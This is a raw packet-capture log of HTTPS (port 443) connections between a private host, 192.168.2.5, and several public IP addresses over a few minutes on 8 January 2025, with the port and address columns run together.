                                                                                                Jan 8, 2025 14:48:16.272834063 CET44349740104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:16.272855997 CET44349740104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:16.272860050 CET49740443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:16.272870064 CET49740443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:16.272871971 CET44349740104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:16.272901058 CET49740443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:16.272906065 CET44349740104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:16.272932053 CET49740443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:16.273000956 CET49740443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:16.273195982 CET44349740104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:16.273246050 CET44349740104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:16.273257017 CET49740443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:16.273261070 CET44349740104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:16.273315907 CET49740443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:16.273315907 CET49740443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:16.273562908 CET44349740104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:16.273711920 CET49740443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:16.273734093 CET44349740104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:16.273806095 CET49740443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:16.273926020 CET44349740104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:16.274091005 CET44349740104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:16.274122000 CET49740443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:16.274122000 CET44349740104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:16.274131060 CET44349740104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:16.274154902 CET49740443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:16.274466991 CET49740443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:16.274683952 CET44349740104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:16.274801970 CET49740443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:16.274808884 CET44349740104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:16.274840117 CET44349740104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:16.274871111 CET49740443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:16.274874926 CET44349740104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:16.274903059 CET49740443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:16.275031090 CET44349740104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:16.275142908 CET49740443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:16.275146961 CET44349740104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:16.275233984 CET49740443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:16.284734011 CET49741443192.168.2.5188.114.96.3
                                                                                                Jan 8, 2025 14:48:16.358376980 CET44349740104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:16.358414888 CET44349740104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:16.358460903 CET44349740104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:16.358472109 CET49740443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:16.358478069 CET44349740104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:16.358500004 CET49740443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:16.358545065 CET49740443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:16.358716011 CET44349740104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:16.358751059 CET44349740104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:16.358784914 CET49740443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:16.358789921 CET44349740104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:16.358818054 CET49740443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:16.358865023 CET44349740104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:16.358967066 CET49740443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:16.358972073 CET44349740104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:16.359061003 CET44349740104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:16.359091997 CET49740443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:16.359096050 CET44349740104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:16.359122992 CET49740443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:16.359159946 CET44349740104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:16.359309912 CET49740443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:16.359319925 CET44349740104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:16.359513044 CET44349740104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:16.359582901 CET49740443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:16.359587908 CET44349740104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:16.359596014 CET44349740104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:16.359631062 CET44349740104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:16.359659910 CET49740443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:16.359663963 CET44349740104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:16.359690905 CET44349740104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:16.359693050 CET49740443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:16.359909058 CET49740443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:16.360481024 CET49740443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:16.360491037 CET44349740104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:16.387293100 CET49738443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:16.387355089 CET44349738104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:16.595088005 CET49743443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:16.595149040 CET44349743104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:16.595566988 CET49743443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:16.596684933 CET49743443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:16.596698046 CET44349743104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:16.680336952 CET44349741188.114.96.3192.168.2.5
                                                                                                Jan 8, 2025 14:48:16.680396080 CET44349741188.114.96.3192.168.2.5
                                                                                                Jan 8, 2025 14:48:16.680483103 CET49741443192.168.2.5188.114.96.3
                                                                                                Jan 8, 2025 14:48:16.696635008 CET49744443192.168.2.535.190.80.1
                                                                                                Jan 8, 2025 14:48:16.696662903 CET4434974435.190.80.1192.168.2.5
                                                                                                Jan 8, 2025 14:48:16.696774960 CET49744443192.168.2.535.190.80.1
                                                                                                Jan 8, 2025 14:48:16.697168112 CET49744443192.168.2.535.190.80.1
                                                                                                Jan 8, 2025 14:48:16.697185993 CET4434974435.190.80.1192.168.2.5
                                                                                                Jan 8, 2025 14:48:16.763761997 CET49741443192.168.2.5188.114.96.3
                                                                                                Jan 8, 2025 14:48:16.763814926 CET44349741188.114.96.3192.168.2.5
                                                                                                Jan 8, 2025 14:48:17.057816029 CET44349743104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:17.063045979 CET49743443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:17.063091040 CET44349743104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:17.063498020 CET44349743104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:17.065176010 CET49743443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:17.065253019 CET44349743104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:17.065351963 CET49743443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:17.111330986 CET44349743104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:17.126266003 CET49745443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:17.126321077 CET44349745104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:17.126386881 CET49745443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:17.126646996 CET49745443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:17.126663923 CET44349745104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:17.154391050 CET4434974435.190.80.1192.168.2.5
                                                                                                Jan 8, 2025 14:48:17.154654026 CET49744443192.168.2.535.190.80.1
                                                                                                Jan 8, 2025 14:48:17.154666901 CET4434974435.190.80.1192.168.2.5
                                                                                                Jan 8, 2025 14:48:17.155736923 CET4434974435.190.80.1192.168.2.5
                                                                                                Jan 8, 2025 14:48:17.155798912 CET49744443192.168.2.535.190.80.1
                                                                                                Jan 8, 2025 14:48:17.161371946 CET49744443192.168.2.535.190.80.1
                                                                                                Jan 8, 2025 14:48:17.161432028 CET4434974435.190.80.1192.168.2.5
                                                                                                Jan 8, 2025 14:48:17.161534071 CET49744443192.168.2.535.190.80.1
                                                                                                Jan 8, 2025 14:48:17.161540985 CET4434974435.190.80.1192.168.2.5
                                                                                                Jan 8, 2025 14:48:17.193681955 CET44349743104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:17.193770885 CET44349743104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:17.193819046 CET49743443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:17.193833113 CET44349743104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:17.193895102 CET49743443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:17.194467068 CET49743443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:17.194484949 CET44349743104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:17.207396984 CET49744443192.168.2.535.190.80.1
                                                                                                Jan 8, 2025 14:48:17.249949932 CET49746443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:17.249982119 CET44349746104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:17.250068903 CET49746443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:17.250313044 CET49746443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:17.250324011 CET44349746104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:17.283091068 CET4434974435.190.80.1192.168.2.5
                                                                                                Jan 8, 2025 14:48:17.283225060 CET4434974435.190.80.1192.168.2.5
                                                                                                Jan 8, 2025 14:48:17.283272982 CET49744443192.168.2.535.190.80.1
                                                                                                Jan 8, 2025 14:48:17.283415079 CET49744443192.168.2.535.190.80.1
                                                                                                Jan 8, 2025 14:48:17.283427954 CET4434974435.190.80.1192.168.2.5
                                                                                                Jan 8, 2025 14:48:17.283437014 CET49744443192.168.2.535.190.80.1
                                                                                                Jan 8, 2025 14:48:17.283474922 CET49744443192.168.2.535.190.80.1
                                                                                                Jan 8, 2025 14:48:17.284135103 CET49747443192.168.2.535.190.80.1
                                                                                                Jan 8, 2025 14:48:17.284193039 CET4434974735.190.80.1192.168.2.5
                                                                                                Jan 8, 2025 14:48:17.284251928 CET49747443192.168.2.535.190.80.1
                                                                                                Jan 8, 2025 14:48:17.284801006 CET49747443192.168.2.535.190.80.1
                                                                                                Jan 8, 2025 14:48:17.284817934 CET4434974735.190.80.1192.168.2.5
                                                                                                Jan 8, 2025 14:48:17.581068993 CET44349745104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:17.581748962 CET49745443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:17.581773043 CET44349745104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:17.582082987 CET44349745104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:17.582425117 CET49745443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:17.582485914 CET44349745104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:17.582581997 CET49745443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:17.623332024 CET44349745104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:17.722830057 CET44349746104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:17.723143101 CET49746443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:17.723176003 CET44349746104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:17.723496914 CET44349746104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:17.724745989 CET49746443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:17.724807024 CET44349746104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:17.725076914 CET49746443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:17.737015963 CET4434974735.190.80.1192.168.2.5
                                                                                                Jan 8, 2025 14:48:17.737782955 CET49747443192.168.2.535.190.80.1
                                                                                                Jan 8, 2025 14:48:17.737824917 CET4434974735.190.80.1192.168.2.5
                                                                                                Jan 8, 2025 14:48:17.738399982 CET4434974735.190.80.1192.168.2.5
                                                                                                Jan 8, 2025 14:48:17.738703966 CET49747443192.168.2.535.190.80.1
                                                                                                Jan 8, 2025 14:48:17.738789082 CET4434974735.190.80.1192.168.2.5
                                                                                                Jan 8, 2025 14:48:17.738909960 CET49747443192.168.2.535.190.80.1
                                                                                                Jan 8, 2025 14:48:17.740154028 CET44349745104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:17.740230083 CET44349745104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:17.740292072 CET49745443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:17.741302967 CET49745443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:17.741322994 CET44349745104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:17.771323919 CET44349746104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:17.783329010 CET4434974735.190.80.1192.168.2.5
                                                                                                Jan 8, 2025 14:48:17.855369091 CET44349746104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:17.855436087 CET44349746104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:17.856117964 CET49746443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:17.856693983 CET49746443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:17.856715918 CET44349746104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:17.863054991 CET49748443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:17.863116980 CET44349748104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:17.863429070 CET49748443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:17.863720894 CET49748443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:17.863735914 CET44349748104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:17.863966942 CET4434974735.190.80.1192.168.2.5
                                                                                                Jan 8, 2025 14:48:17.864058018 CET4434974735.190.80.1192.168.2.5
                                                                                                Jan 8, 2025 14:48:17.864146948 CET49747443192.168.2.535.190.80.1
                                                                                                Jan 8, 2025 14:48:17.864382029 CET49747443192.168.2.535.190.80.1
                                                                                                Jan 8, 2025 14:48:17.864407063 CET4434974735.190.80.1192.168.2.5
                                                                                                Jan 8, 2025 14:48:18.337862015 CET44349748104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:18.396536112 CET49748443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:18.423115969 CET49748443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:18.423145056 CET44349748104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:18.423660040 CET44349748104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:18.472008944 CET49748443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:18.496303082 CET49748443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:18.496303082 CET49748443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:18.496438980 CET44349748104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:18.536518097 CET49748443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:18.577819109 CET49749443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:18.577856064 CET44349749104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:18.577961922 CET49749443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:18.578372002 CET49749443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:18.578386068 CET44349749104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:18.602122068 CET44349748104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:18.602186918 CET44349748104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:18.602420092 CET49748443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:18.608927011 CET49748443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:18.608947039 CET44349748104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:19.040414095 CET44349749104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:19.040698051 CET49749443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:19.040719986 CET44349749104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:19.041003942 CET44349749104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:19.041311979 CET49749443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:19.041363955 CET44349749104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:19.041588068 CET49749443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:19.041657925 CET49749443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:19.041687012 CET44349749104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:19.041773081 CET49749443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:19.041800022 CET44349749104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:19.289619923 CET44349749104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:19.289670944 CET44349749104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:19.289702892 CET44349749104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:19.289730072 CET44349749104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:19.289730072 CET49749443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:19.289750099 CET44349749104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:19.289776087 CET49749443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:19.289793015 CET44349749104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:19.289834976 CET49749443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:19.289840937 CET44349749104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:19.290205956 CET44349749104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:19.290256023 CET49749443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:19.290262938 CET44349749104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:19.294301033 CET44349749104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:19.294348955 CET44349749104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:19.294352055 CET49749443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:19.294359922 CET44349749104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:19.294399023 CET49749443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:19.294404030 CET44349749104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:19.344815969 CET49749443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:19.378204107 CET44349749104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:19.378323078 CET44349749104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:19.378367901 CET49749443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:19.378375053 CET44349749104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:19.378412008 CET44349749104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:19.378446102 CET44349749104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:19.378457069 CET49749443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:19.378463030 CET44349749104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:19.378504992 CET49749443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:19.378878117 CET44349749104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:19.378981113 CET44349749104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:19.379033089 CET49749443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:19.379261017 CET49749443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:19.379275084 CET44349749104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:19.414726019 CET49751443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:19.414758921 CET44349751104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:19.414848089 CET49751443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:19.415098906 CET49751443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:19.415107965 CET44349751104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:19.873337030 CET44349751104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:19.873680115 CET49751443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:19.873703003 CET44349751104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:19.874038935 CET44349751104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:19.874375105 CET49751443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:19.874434948 CET44349751104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:19.874545097 CET49751443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:19.915330887 CET44349751104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:19.925107002 CET49751443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:20.008337021 CET44349751104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:20.008405924 CET44349751104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:20.008529902 CET49751443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:20.010238886 CET49751443192.168.2.5104.18.94.41
                                                                                                Jan 8, 2025 14:48:20.010248899 CET44349751104.18.94.41192.168.2.5
                                                                                                Jan 8, 2025 14:48:21.311903954 CET49703443192.168.2.523.1.237.91
                                                                                                Jan 8, 2025 14:48:21.312150002 CET49703443192.168.2.523.1.237.91
                                                                                                Jan 8, 2025 14:48:21.316725016 CET4434970323.1.237.91192.168.2.5
                                                                                                Jan 8, 2025 14:48:21.316890955 CET4434970323.1.237.91192.168.2.5
                                                                                                Jan 8, 2025 14:48:21.331712961 CET49757443192.168.2.523.1.237.91
                                                                                                Jan 8, 2025 14:48:21.331758976 CET4434975723.1.237.91192.168.2.5
                                                                                                Jan 8, 2025 14:48:21.331985950 CET49757443192.168.2.523.1.237.91
                                                                                                Jan 8, 2025 14:48:21.345315933 CET49757443192.168.2.523.1.237.91
                                                                                                Jan 8, 2025 14:48:21.345330000 CET4434975723.1.237.91192.168.2.5
                                                                                                Jan 8, 2025 14:48:21.940203905 CET4434975723.1.237.91192.168.2.5
                                                                                                Jan 8, 2025 14:48:21.941858053 CET49757443192.168.2.523.1.237.91
                                                                                                Jan 8, 2025 14:48:22.388497114 CET44349725172.217.18.4192.168.2.5
                                                                                                Jan 8, 2025 14:48:22.388562918 CET44349725172.217.18.4192.168.2.5
                                                                                                Jan 8, 2025 14:48:22.388663054 CET49725443192.168.2.5172.217.18.4
                                                                                                Jan 8, 2025 14:48:22.943255901 CET49725443192.168.2.5172.217.18.4
                                                                                                Jan 8, 2025 14:48:22.943270922 CET44349725172.217.18.4192.168.2.5
                                                                                                Jan 8, 2025 14:48:41.091564894 CET4434975723.1.237.91192.168.2.5
                                                                                                Jan 8, 2025 14:48:41.091708899 CET49757443192.168.2.523.1.237.91
                                                                                                Jan 8, 2025 14:49:11.894771099 CET50024443192.168.2.5172.217.18.4
                                                                                                Jan 8, 2025 14:49:11.894834042 CET44350024172.217.18.4192.168.2.5
                                                                                                Jan 8, 2025 14:49:11.894953012 CET50024443192.168.2.5172.217.18.4
                                                                                                Jan 8, 2025 14:49:11.895217896 CET50024443192.168.2.5172.217.18.4
                                                                                                Jan 8, 2025 14:49:11.895237923 CET44350024172.217.18.4192.168.2.5
                                                                                                Jan 8, 2025 14:49:12.531295061 CET44350024172.217.18.4192.168.2.5
                                                                                                Jan 8, 2025 14:49:12.531892061 CET50024443192.168.2.5172.217.18.4
                                                                                                Jan 8, 2025 14:49:12.531923056 CET44350024172.217.18.4192.168.2.5
                                                                                                Jan 8, 2025 14:49:12.532222986 CET44350024172.217.18.4192.168.2.5
                                                                                                Jan 8, 2025 14:49:12.532536983 CET50024443192.168.2.5172.217.18.4
                                                                                                Jan 8, 2025 14:49:12.532604933 CET44350024172.217.18.4192.168.2.5
                                                                                                Jan 8, 2025 14:49:12.580883980 CET50024443192.168.2.5172.217.18.4
                                                                                                Jan 8, 2025 14:49:22.441106081 CET44350024172.217.18.4192.168.2.5
                                                                                                Jan 8, 2025 14:49:22.441170931 CET44350024172.217.18.4192.168.2.5
                                                                                                Jan 8, 2025 14:49:22.441278934 CET50024443192.168.2.5172.217.18.4
                                                                                                Jan 8, 2025 14:49:22.944554090 CET50024443192.168.2.5172.217.18.4
                                                                                                Jan 8, 2025 14:49:22.944571972 CET44350024172.217.18.4192.168.2.5
                                                                                                Jan 8, 2025 14:50:11.965167046 CET50027443192.168.2.5142.250.186.132
                                                                                                Jan 8, 2025 14:50:11.965214968 CET44350027142.250.186.132192.168.2.5
                                                                                                Jan 8, 2025 14:50:11.965276003 CET50027443192.168.2.5142.250.186.132
                                                                                                Jan 8, 2025 14:50:11.965519905 CET50027443192.168.2.5142.250.186.132
                                                                                                Jan 8, 2025 14:50:11.965538025 CET44350027142.250.186.132192.168.2.5
                                                                                                Jan 8, 2025 14:50:12.602258921 CET44350027142.250.186.132192.168.2.5
                                                                                                Jan 8, 2025 14:50:12.602979898 CET50027443192.168.2.5142.250.186.132
                                                                                                Jan 8, 2025 14:50:12.603002071 CET44350027142.250.186.132192.168.2.5
                                                                                                Jan 8, 2025 14:50:12.603348017 CET44350027142.250.186.132192.168.2.5
                                                                                                Jan 8, 2025 14:50:12.604187965 CET50027443192.168.2.5142.250.186.132
                                                                                                Jan 8, 2025 14:50:12.604252100 CET44350027142.250.186.132192.168.2.5
                                                                                                Jan 8, 2025 14:50:12.659128904 CET50027443192.168.2.5142.250.186.132
                                                                                                Jan 8, 2025 14:50:19.429874897 CET50028443192.168.2.5104.18.95.41
                                                                                                Jan 8, 2025 14:50:19.429913998 CET44350028104.18.95.41192.168.2.5
                                                                                                Jan 8, 2025 14:50:19.429994106 CET50028443192.168.2.5104.18.95.41
                                                                                                Jan 8, 2025 14:50:19.430180073 CET50028443192.168.2.5104.18.95.41
                                                                                                Jan 8, 2025 14:50:19.430191040 CET44350028104.18.95.41192.168.2.5
                                                                                                Jan 8, 2025 14:50:19.909598112 CET44350028104.18.95.41192.168.2.5
                                                                                                Jan 8, 2025 14:50:19.909879923 CET50028443192.168.2.5104.18.95.41
                                                                                                Jan 8, 2025 14:50:19.909888029 CET44350028104.18.95.41192.168.2.5
                                                                                                Jan 8, 2025 14:50:19.910171032 CET44350028104.18.95.41192.168.2.5
                                                                                                Jan 8, 2025 14:50:19.914649963 CET50028443192.168.2.5104.18.95.41
                                                                                                Jan 8, 2025 14:50:19.914705038 CET44350028104.18.95.41192.168.2.5
                                                                                                Jan 8, 2025 14:50:19.914872885 CET50028443192.168.2.5104.18.95.41
                                                                                                Jan 8, 2025 14:50:19.959330082 CET44350028104.18.95.41192.168.2.5
                                                                                                Jan 8, 2025 14:50:20.065202951 CET44350028104.18.95.41192.168.2.5
                                                                                                Jan 8, 2025 14:50:20.065289974 CET44350028104.18.95.41192.168.2.5
